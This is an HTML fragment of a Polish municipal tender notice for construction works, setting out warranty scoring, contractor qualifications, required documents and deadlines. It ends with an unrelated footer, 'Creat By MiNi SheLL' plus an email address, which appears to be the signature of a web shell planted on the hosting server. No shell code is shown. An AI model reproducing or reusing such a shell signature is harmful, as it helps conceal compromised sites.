Pzp.<br/>3.4.Jeżeli Wykonawca nie wypełni pozycji dotyczącej „Okresu gwarancji jakości i rękojmi za wady”, Zamawiający przyjmie tylko<br/>wymagany minimalny okres gwarancji jakości i rękojmi za wady na wszystkie roboty objęte przedmiotem zamówienia na okres 3 lat,<br/>licząc od daty odbioru końcowego robót, a oferta w tym kryterium otrzyma 0 punktów.<br/>3.5.Jeżeli Wykonawca zadeklaruje okres gwarancji jakości i rękojmi za wady na okres równy 3 lat, licząc od daty odbioru końcowego<br/>robót, oferta taka w kryterium „Okres gwarancji jakości i rękojmi za wady” otrzyma 0 punktów, ponieważ punkty w kryterium „Okres<br/>gwarancji jakości i rękojmi za wady” zostaną przyznane tylko za przedłużenie okresu gwarancji jakości i rękojmi za wady o okres<br/>dłuższy niż ustalony minimalny okres.<br/>3.6.Oferta w kryterium „Okres gwarancji jakości i rękojmi za wady” – wskaźnik „G” może uzyskać maksymalnie 20 punktów według<br/>następujących zasad:<br/>a)w przypadku deklaracji udzielenia gwarancji jakości i rękojmi za wady na okres 4 lat - Wykonawca otrzyma: 5 punktów,<br/>b)w przypadku deklaracji udzielenia gwarancji jakości i rękojmi za wady na okres 5 lat - Wykonawca otrzyma: 10 punktów<br/>c)w przypadku deklaracji udzielenia gwarancji jakości i rękojmi za wady na okres 6 lat - Wykonawca otrzyma: 15 punktów<br/>d)w przypadku deklaracji udzielenia gwarancji jakości i rękojmi za wady na okres 7 lat - Wykonawca otrzyma: 20 punktów<br/>3.7.Wymagane jest podanie w Formularzu Oferty okresu gwarancji jakości i rękojmi za wady wyrażonego w całkowitej liczbie lat.<br/>4.Po dokonaniu oceny punkty zostaną zsumowane dla każdego kryterium oddzielnie. Suma punktów (P) przyznanych w ramach<br/>każdego z podanych kryteriów będzie stanowić końcową ocenę oferty wyliczoną zgodnie z wzorem: P = C + G.<br/>5.Punktacja przyznana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości i rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunków powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunków powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunków powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że:<br/>dysponują osobami zdolnymi do realizacji zamówienia, tj.:<br/>- kierownik budowy, jedna osoba z uprawnieniami budowlanymi do kierowania robotami w specjalności konstrukcyjno –<br/>budowlanej w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo Budowlane oraz Rozporządzenia Ministra Infrastruktury i<br/>Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie.<br/>- kierownik robót, jedną osobą z uprawnieniami budowlanymi do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych w rozumieniu<br/>ustawy<br/>z dnia 7 lipca 1994r. Prawo Budowlane oraz Rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w<br/>sprawie samodzielnych funkcji technicznych w budownictwie.<br/>- kierownik robót, jedną osoba z uprawnieniami budowlanymi do kierowania robotami w specjalności instalacyjnej w<br/>zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo<br/>Budowlane oraz Rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014r. w sprawie samodzielnych<br/>funkcji technicznych w budownictwie.<br/>PRZEZ UPRAWNIENIA BUDOWLANE rozumie się uprawnienia do sprawowania samodzielnych funkcji technicznych w<br/>budownictwie, wydane na podstawie Prawa Budowlanego (rozdz. 2 Samodzielne funkcje techniczne w budownictwie) oraz<br/>w Rozporządzeniu Przygotowania Zawodowego lub odpowiadające im ważne uprawnienia budowlane, które zostały<br/>wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia wydane obywatelom państw<br/>Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów<br/>ustawy Prawo Budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (Dz. U. z 2020 r. poz. 220).<br/>3.Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do<br/>warunków dotyczących zdolności technicznej lub zawodowej – dopuszcza łącznie spełnienie warunku przez Wykonawców.<br/>Warunek określony w pkt 2 ppkt 4) powyżej zostanie spełniony jeżeli co najmniej jeden z Wykonawców wspólnie<br/>ubiegających się o zamówienie potwierdzi, iż spełnia ww. warunek albo wykonawcy łącznie wykażą dysponowanie osobami.<br/>4.Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy, w zakresie art. 108 ust.1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. z dnia 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej ;<br/>-w przypadku gdy w postępowaniu zostanie złożona tylko jedna oferta, Zamawiający odstąpi od wezwania Wykonawcy do złożenia<br/>oświadczenia w zakresie określonym w art. 108 ust. 1 pkt. 5 ustawy, ponieważ zgodnie z opinią Urzędu Zamówień Publicznych<br/>wskazana powyżej podstawa wykluczenia ma zastosowanie tylko w przypadku złożenia co najmniej dwóch ofert, co oznacza, że<br/>wskazany powyżej przepis nie daje podstaw do wykluczenia Wykonawcy z postępowania, w przypadku gdy złożono tylko jedną ofertę. W związku z powyższym w świetle celu, jakim jest przeciwdziałanie zakłóceniu konkurencji w postępowaniu przez grupę kapitałową, Zamawiający odstąpi od wezwania Wykonawcy do złożenia w/w oświadczenia w przypadku gdy zostanie złożona tylko jedna oferta, ponieważ w takiej sytuacji staje się ono zbędne.<br/>2. Odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust.1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>3.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 2 składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument, o którym mowa<br/>powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją<br/>o podstawie do dysponowania tymi osobami.<br/>W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia wraz z oświadczeniem, o<br/>którym mowa w rozdziale IX pkt 1 SWZ, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby, zgodnie z katalogiem dokumentów określonych w rozdziale IX SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żądał przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz oferty<br/>2.Pełnomocnictwo złożone w formie oryginału lub kopii poświadczonej notarialnie (jeżeli dotyczy)<br/>3.Zobowiązanie innego podmiotu na zasobach którego polega Wykonawca (jeżeli dotyczy),<br/>4.Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>rozdziale IX ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnienie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnienie warunków udziału w postępowaniu.<br/>3.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy.<br/>4.Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakres zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy<br/>określa § 13 wzoru umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma Zamówień Publicznych Gminy Olsztyn: https://zamowienia.olsztyn.eu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-03 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com